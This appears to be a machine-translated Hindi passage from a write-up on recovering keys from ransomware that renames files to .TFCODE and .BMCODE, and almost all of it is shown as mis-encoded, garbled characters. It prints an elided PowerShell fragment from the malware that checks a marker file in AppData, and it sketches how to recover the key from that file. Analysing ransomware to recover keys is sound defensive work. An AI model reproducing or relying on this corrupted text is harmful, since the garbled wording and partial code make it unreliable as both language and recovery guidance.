рд╡реЗрд░рд┐рдПрдВрдЯ рд╣реИрдВ рдЬрд╣рд╛рдВ рдЖрдк рдХреБрдВрдЬреА рдХрд╛ рдкрддрд╛ рдирд╣реАрдВ рд▓рдЧрд╛ рд╕рдХрддреЗ рд╣реИрдВред
рдореИрдВ рд╕рд┐рдо рдХреЛ рдЕрд▓рд╡рд┐рджрд╛ рдХрд╣рддрд╛ рд╣реВрдВ рдФрд░ рдЖрд╢рд╛ рдХрд░рддрд╛ рд╣реВрдВ рдХрд┐ рдореИрдВ рднреА рд╕рдордп рдкрд╛рдКрдВрдЧрд╛ рдФрд░ рд▓рд┐рдЦреВрдВрдЧрд╛ рдХрд┐ рдХреИрд╕реЗ рд╣рдордиреЗ рдЕрдкрдиреЗ NIIimorgorvprom рдЙрджреНрдпреЛрдЧ рдореЗрдВ рд╡реАрдбрд┐рдпреЛ рдирд┐рдЧрд░рд╛рдиреА рд╕реНрдерд╛рдкрд┐рдд рдХреА рдФрд░ рд╡рд┐рднрд╛рдЧ рдХреЗ рджрд░рд╡рд╛рдЬреЗ рдкрд░ рдШрдВрдЯреА рдХреЗ рд░реВрдк рдореЗрдВ рдорд╛рдЙрд╕ рд▓рдЯрдХрд╛ рджрд┐рдпрд╛ред
рдпреБрдкреАрдбреАрдкрддреНрд░рд╛рдЪрд╛рд░ рдХреЗ рдкрд░рд┐рдгрд╛рдореЛрдВ рдХреЗ рдЕрдиреБрд╕рд╛рд░редрд╡рд┐рдХрд▓реНрдк
.TFCODE.TFCODE рд╡рд┐рдХрд▓реНрдк 50 рдЕрдХреНрд╖рд░реЛрдВ рдХреЗ рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред рдореЗрдВ рдкрд╛рд╕рд╡рд░реНрдб рдлрд╝рд╛рдЗрд▓ рдорд┐рд▓реА
C: \ Documents and Settings \ USER \ Application Dataред рдлрд╝рд╛рдЗрд▓ рд╕рд┐рд╕реНрдЯрдо рдЙрддреНрдкрд╛рдж рдХрд╛ рдирд╛рдо
рдореИрд▓рд╡реЗрдпрд░ рдХреЛрдб рдореЗрдВ, рдкреБрдирд░рд╛рд░рдВрдн рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдЕрдЬреАрдмреЛрдЧрд░реАрдм рдЬрд╛рдВрдЪ рд▓рд╛рдЧреВ рдХреА рдЬрд╛рддреА рд╣реИ
$idpath = $env:APPDATA + "\" + (gwmi win32_computersystem).model; if(Test-Path $idpath){$getc = Get-Content $idpath; if ($getc -eq "good"){exit} else {$ek = $getc}} ...... Set-Content -Path $idpath -Value "good"
рдпрджрд┐ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдЕрдЪреНрдЫрд╛ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ рд╣реИ, рддреЛ рдХреБрдВрдЬреА рдХреЛ рдвреВрдВрдврдирд╛ рдЗрддрдирд╛ рдЖрд╕рд╛рди рдирд╣реАрдВ рд╣реИред рдЗрд╕рд▓рд┐рдП, рдпрджрд┐ рдЖрдкрдиреЗ рдЧрд▓рддреА рд╕реЗ рдПрдХ рдореИрд▓рд╡реЗрдпрд░ рд▓реЙрдиреНрдЪ рдХрд┐рдпрд╛ рд╣реИ рдпрд╛ рджреЗрдЦрд╛ рд╣реИ рдХрд┐ рдлрд╛рдЗрд▓реЗрдВ рдПрдХреНрд╕рдЯреЗрдВрд╢рди рдмрджрд▓рдирд╛ рд╢реБрд░реВ рдХрд░ рджреЗрддреА рд╣реИрдВ, рддреЛ рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рд░реЛрдХрдиреЗ рдФрд░ рдХреБрдВрдЬреА рдХреЛ рдмрдЪрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рддреБрд░рдВрдд рдХрдВрдкреНрдпреВрдЯрд░ рдХреЛ рдмрдВрдж рдХрд░ рджреЗрдВредрдмрд╛рдХреА рд╡рд╣реА рд╣реИред рдЪрд░
$ ek рдореЗрдВ рд╣рдордиреЗ рдкрд╛рдпрд╛ рдлрд╛рдЗрд▓ рд╕реЗ рд▓рд╛рдЗрди рд▓рдЧрд╛рдИред .BMCODE рдХреЛ .TFCODE рдореЗрдВ рдмрджрд▓реЗрдВ, рдЪрд░
$ рдирдордХ рдФрд░
$ init рдХреА рдЬрд╛рдБрдЪ рдХрд░реЗрдВ рдФрд░ рдирд╛рдо рдмрджрд▓реЗрдВред * .TTT рдХреЛ рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рдХреНрдпрд╛ рдмрдирд╛рдпрд╛ рдЧрдпрд╛ рдерд╛ (READ_ME_NOW.TXT)ред
рд╣рдо рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреА рдкреНрд░рддрд┐рдпреЛрдВ рдкрд░ рдЯреНрд░рд╛рдпрд▓ рд░рди рдмрдирд╛рддреЗ рд╣реИрдВред рдЕрдЧрд░ рд╕рдм рдареАрдХ рд╣реИ, рддреЛ рдЖрдирдиреНрдж рдордирд╛рдУред